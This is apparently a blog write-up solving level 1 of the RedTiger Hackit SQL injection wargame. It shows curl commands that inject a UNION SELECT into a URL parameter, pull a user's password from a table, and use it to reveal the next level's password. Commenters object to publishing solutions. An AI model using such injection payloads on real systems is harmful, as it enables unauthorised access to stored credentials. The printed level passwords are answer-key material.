# RedTigers Hackit wargame: Level 1


# curl --silent --insecure https://redtiger.dyndns.org/hackit/level1.php
<b>Welcome to level 1</b>
<br><br>
Lets start with a simple injection.
<br><br>
Target: Get the login for the user Hornoxe
<br>
Hint: You really need one? omg -_-
<br>
Tablename: level1_users
<br><br><br>


<br>Category: <a href="?cat=1">1</a><br><br>This category does not exist! <br>                  <br><br><br>
                        <form method="post">
                                Username: <input type="text" name="user"><br>
                                Password: <input type="text" name="password">
                                <input type="submit" name="login" value="Login">
                        </form>
                        <br>
# curl --silent --insecure "https://redtiger.dyndns.org/hackit/level1.php?cat=1%20union%20select%201,2,username,password%20from%20level1_users" | grep ">Hornoxe" | awk -F "<br>" '{print $4}'
7468617477617365617379
# curl --silent --insecure --request POST --data "user=Hornoxe&password=7468617477617365617379&login=Login" https://redtiger.dyndns.org/hackit/level1.php | grep is:
<br>The password for the next level is: <b>656173796c6576656c7361726565617379</b> <br><br>

2 comments:

Anonymous said...

:(
posting solutions to wargames is so super lame :(

Anonymous said...

the site is very clear about it.
why dont you respect that?

Dont bruteforce the passwords and dont make any solutions public!!!